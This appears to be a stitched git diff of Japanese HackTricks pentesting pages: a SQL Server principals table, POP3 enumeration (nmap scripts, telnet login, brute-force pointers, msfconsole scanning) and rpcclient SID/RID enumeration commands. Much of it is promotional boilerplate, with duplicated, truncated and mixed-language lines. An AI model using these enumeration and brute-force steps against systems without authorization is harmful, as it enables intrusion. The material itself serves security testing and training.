* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションを入手してください
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>
[**ドキュメント**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16)から取得したテーブルです
[**ドキュメント**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16)から取得した
| カラム名 | データ型 | 説明 |
| ------------------------------------------ | ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **name** | **sysname** | データベース内で一意のプリンシパルの名前です。 |
| **principal\_id** | **int** | データベース内で一意のプリンシパルのIDです。 |
| **type** | **char(1)** | <p>プリンシパルのタイプ:<br><br>A = アプリケーションロール<br><br>C = 証明書にマップされたユーザー<br><br>E = Azure Active Directoryの外部ユーザー<br><br>G = Windowsグループ<br><br>K = 非対称キーにマップされたユーザー<br><br>R = データベースロール<br><br>S = SQLユーザー<br><br>U = Windowsユーザー<br><br>X = Azure Active Directoryグループまたはアプリケーションの外部グループ</p> |
| **type\_desc** | **nvarchar(60)** | <p>プリンシパルタイプの説明です<br><br>APPLICATION_ROLE<br><br>CERTIFICATE_MAPPED_USER<br><br>EXTERNAL_USER<br><br>WINDOWS_GROUP<br><br>ASYMMETRIC_KEY_MAPPED_USER<br><br>DATABASE_ROLE<br><br>SQL_USER<br><br>WINDOWS_USER<br><br>EXTERNAL_GROUPS</p> |
| **default\_schema\_name** | **sysname** | SQL名がスキーマを指定していない場合に使用される名前です。タイプがS、U、またはAでないプリンシパルの場合はNULLです。 |
| **create\_date** | **datetime** | プリンシパルが作成された時刻です。 |
| **modify\_date** | **datetime** | プリンシパルが最後に変更された時刻です。 |
| **owning\_principal\_id** | **int** | このプリンシパルを所有するプリンシパルのIDです。すべての固定データベースロールはデフォルトで**dbo**によって所有されています。 |
| **sid** | **varbinary(85)** | プリンシパルのSIDセキュリティ識別子です。SYSおよびINFORMATION SCHEMASの場合はNULLです。 |
| **is\_fixed\_role** | **bit** | 1の場合、この行は固定データベースロール(db\_owner、db\_accessadmin、db\_datareader、db\_datawriter、db\_ddladmin、db\_securityadmin、db\_backupoperator、db\_denydatareader、db\_denydatawriter)のエントリを表します。 |
| **authentication\_type** | **int** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>認証タイプを示します。以下は可能な値とその説明です。<br><br>0 : 認証なし<br>1 : インスタンス認証<br>2 : データベース認証<br>3 : Windows認証<br>4 : Azure Active Directory認証</p> |
| **authentication\_type\_desc** | **nvarchar(60)** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>認証タイプの説明です。以下は可能な値とその説明です。<br><br><code>NONE</code> : 認証なし<br><code>INSTANCE</code> : インスタンス認証<br><code>DATABASE</code> : データベース認証<br><code>WINDOWS</code> : Windows認証<br><code>EXTERNAL</code>: Azure Active Directory認証</p> |
| **default\_language\_name** | **sysname** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>このプリンシパルのデフォルト言語を示します。</p> |
| **default\_language\_lcid** | **int** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>このプリンシパルのデフォルトLCIDを示します。</p> |
| **allow\_encrypted\_value\_modifications** | **bit** | <p><strong>適用対象</strong>: SQL Server 201613.x以降、SQL Database。<br><br>サーバー上のバルクコピー操作で暗号化メタデータのチェックを抑制します。これにより、データを復号化せずに、Always Encryptedを使用してテーブルやデータベース間でデータをバルクコピーできます。デフォルトはOFFです。</p> |
| 列名 | データ型 | 説明 |
| ---------------------------------------- | ----------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **name** | **sysname** | データベース内で一意のプリンシパルの名前。 |
| **principal\_id** | **int** | データベース内で一意のプリンシパルのID。 |
| **type** | **char(1)** | <p>プリンシパルの種類:<br><br>A = アプリケーションロール<br><br>C = 証明書にマップされたユーザー<br><br>E = Azure Active Directoryからの外部ユーザー<br><br>G = Windowsグループ<br><br>K = 非対称キーにマップされたユーザー<br><br>R = データベースロール<br><br>S = SQLユーザー<br><br>U = Windowsユーザー<br><br>X = Azure Active Directoryグループまたはアプリケーションからの外部グループ</p> |
| **type\_desc** | **nvarchar(60)** | <p>プリンシパルの種類の説明<br><br>APPLICATION_ROLE<br><br>CERTIFICATE_MAPPED_USER<br><br>EXTERNAL_USER<br><br>WINDOWS_GROUP<br><br>ASYMMETRIC_KEY_MAPPED_USER<br><br>DATABASE_ROLE<br><br>SQL_USER<br><br>WINDOWS_USER<br><br>EXTERNAL_GROUPS</p> |
| **default\_schema\_name** | **sysname** | SQL名がスキーマを指定していない場合に使用される名前。S、U、またはAタイプのプリンシパルの場合はNULL。 |
| **create\_date** | **datetime** | プリンシパルが作成された時刻。 |
| **modify\_date** | **datetime** | プリンシパルが最後に変更された時刻。 |
| **owning\_principal\_id** | **int** | このプリンシパルを所有するプリンシパルのID。すべての固定データベースロールはデフォルトで**dbo**によって所有されています。 |
| **sid** | **varbinary(85)** | プリンシパルのSIDセキュリティ識別子。SYSおよびINFORMATION SCHEMASの場合はNULL。 |
| **is\_fixed\_role** | **bit** | 1の場合、この行は次の固定データベースロールのエントリを表します:db\_owner、db\_accessadmin、db\_datareader、db\_datawriter、db\_ddladmin、db\_securityadmin、db\_backupoperator、db\_denydatareader、db\_denydatawriter。 |
| **authentication\_type** | **int** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>認証タイプを示します。次の値とその説明が可能です。<br><br>0認証なし<br>1インスタンス認証<br>2データベース認証<br>3Windows認証<br>4Azure Active Directory認証</p> |
| **authentication\_type\_desc** | **nvarchar(60)** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>認証タイプの説明。次の値とその説明が可能です。<br><br><code>NONE</code>認証なし<br><code>INSTANCE</code>インスタンス認証<br><code>DATABASE</code>データベース認証<br><code>WINDOWS</code>Windows認証<br><code>EXTERNAL</code>Azure Active Directory認証</p> |
| **default\_language\_name** | **sysname** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>このプリンシパルのデフォルト言語を示します。</p> |
| **default\_language\_lcid** | **int** | <p><strong>適用対象</strong>: SQL Server 201211.x以降。<br><br>このプリンシパルのデフォルトLCIDを示します。</p> |
| **allow\_encrypted\_value\_modifications** | **bit** | <p><strong>適用対象</strong>: SQL Server 201613.x以降、SQL Database。<br><br>サーバーでのバルクコピー操作における暗号化メタデータチェックを抑制します。これにより、ユーザーはデータを復号化せずに、Always Encryptedを使用して暗号化されたデータをテーブルやデータベース間でバルクコピーできます。デフォルトはOFFです。</p> |
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いて
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。これは私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**Telegramグループ**](https://t.me/peass)に参加するか、私を[**Twitter**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**🐦**](https://twitter.com/hacktricks_live)[**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
* [hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングトリックを共有してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションを入手してください
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>

38
network-services-pentesting/pentesting-pop.md
View file

@ -2,13 +2,13 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md) **@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**PRを提出してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に**参加**するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**する**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有**するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**PRを提出**してください。
</details>
@ -22,9 +22,9 @@
## 基本情報
**ポストオフィスプロトコル****POP**)は、ホストマシンがアクセスするためにリモートメールサーバーから電子メールを取り出し、取得するコンピューターネットワーキングおよびインターネット標準**プロトコル**の一種です。**POP**は、OSIモデルのアプリケーション層**プロトコル**であり、エンドユーザーに電子メールの取得と受信の機能を提供します([こちら](https://www.techopedia.com/definition/5383/post-office-protocol-pop)から)。
**ポストオフィスプロトコル****POP**)は、ホストマシンによるアクセス用にリモートメールサーバーから電子メールを取り出し、取得するコンピューターネットワーキングおよびインターネット標準**プロトコル**の一種です。**POP**は、OSIモデルのアプリケーション層**プロトコル**であり、エンドユーザーに電子メールの取得と受信の機能を提供します([こちら](https://www.techopedia.com/definition/5383/post-office-protocol-pop)から)。
**POP**クライアントは通常、接続し、すべてのメッセージを取得し、クライアントシステムに保存し、サーバーから削除します。POPには3つのバージョンがありますが、POP3が最も使用されています。
**POP**クライアントは一般的に接続し、すべてのメッセージを取得し、クライアントシステムに保存し、サーバーから削除します。POPには3つのバージョンがありますが、POP3が最も使用されています。
**デフォルトポート:** 110、995SSL
```
@ -42,17 +42,17 @@ openssl s_client -connect <IP>:995 -crlf -quiet
POP3サーバーの機能を取得するために`CAPA`コマンドを使用できます。
## 自動
## 自動
```bash
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port <PORT> <IP> #All are default scripts
```
`pop3-ntlm-info`プラグインはいくつかの "**sensitive**" データ (Windows versions) を返します。
`pop3-ntlm-info`プラグインはいくつかの "**sensitive**" データWindows バージョン)を返します。
### [POP3 ブルートフォース](../generic-methodologies-and-resources/brute-force.md#pop)
## POP 構文
[こちら](http://sunnyoasis.com/services/emailviatelnet.html) からの POP コマンドの例
[こちら](http://sunnyoasis.com/services/emailviatelnet.html)からの POP コマンドの例
```bash
POP commands:
USER uid Log in as "uid"
@ -66,7 +66,9 @@ QUIT Logout (expunges messages if no RSET)
TOP msg n Show first n lines of message number msg
CAPA Get capabilities
```
例:
### Post Office Protocol (POP)
POP is a protocol used by email clients to retrieve emails from a mail server. During a penetration test, you can attempt to brute force POP credentials or use tools like Hydra to automate the process. Additionally, you can look for misconfigurations or vulnerabilities in the POP server that could be exploited to gain unauthorized access to emails.
```
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
@ -98,10 +100,10 @@ From [https://academy.hackthebox.com/module/112/section/1073](https://academy.ha
| **設定** | **説明** |
| ------------------------- | ----------------------------------------------------------------------------------------- |
| `auth_debug` | すべての認証デバッグログを有効にします。 |
| `auth_debug_passwords` | この設定はログの詳細度を調整し、送信されたパスワードとスキームが記録されます。 |
| `auth_verbose` | 認証失敗した試行とその理由が記録されます。 |
| `auth_verbose_passwords` | 認証に使用されるパスワードが記録され、切り捨てられることもあります。 |
| `auth_anonymous_username` | ANONYMOUS SASL メカニズムを使用してログインする際に使用するユーザー名を指定します。 |
| `auth_debug_passwords` | この設定はログの詳細度を調整し、送信されたパスワードとスキームが記録されます。 |
| `auth_verbose` | 認証失敗した試行とその理由が記録されます。 |
| `auth_verbose_passwords` | 認証に使用されるパスワードが記録され、切り捨てられることもあります。 |
| `auth_anonymous_username` | ANONYMOUS SASL メカニズムを使用してログインする際に使用するユーザー名を指定します。 |
## HackTricks Automatic Commands
```
@ -155,10 +157,10 @@ Command: msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを入手します。
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れます。
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**します。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>

18
network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
View file

@ -7,14 +7,14 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -79,8 +79,8 @@ done
#### SIDを使用した追加操作
* **名前からSIDへの変換**`lookupnames <username>`を使用。
* **さらなるSID**`lsaenumsid`による
* **RIDサイクリングによるさらなるSIDの確認**`lookupsids <sid>`実行。
* **さらなるSID**`lsaenumsid`を介して
* **RIDサイクリングによるさらなるSIDの確認**`lookupsids <sid>`によって実行。
#### **追加コマンド**
@ -98,13 +98,13 @@ done
| lsaaddacctrights | ユーザーアカウントに権限を追加 | |
| lsaremoveacctrights | ユーザーアカウントから権限を削除 | |
| dsroledominfo | LSARPC-DS | プライマリドメイン情報の取得 |
| dsenumdomtrusts | ADフォレスト内の信頼されドメインの列挙 | |
| dsenumdomtrusts | ADフォレスト内の信頼されドメインの列挙 | |
**_samrdump_** **および** **_rpcdump_** の動作を理解するには、[**Pentesting MSRPC**](../135-pentesting-msrpc.md)を読むべきです。
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて迅速に修正できるようにしましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまで、テックスタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
最も重要な脆弱性を見つけて迅速に修正できるようにしましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -115,8 +115,8 @@ done
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですかまたは、HackTricksをPDFでダウンロードしたいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください。**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で[**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**
</details>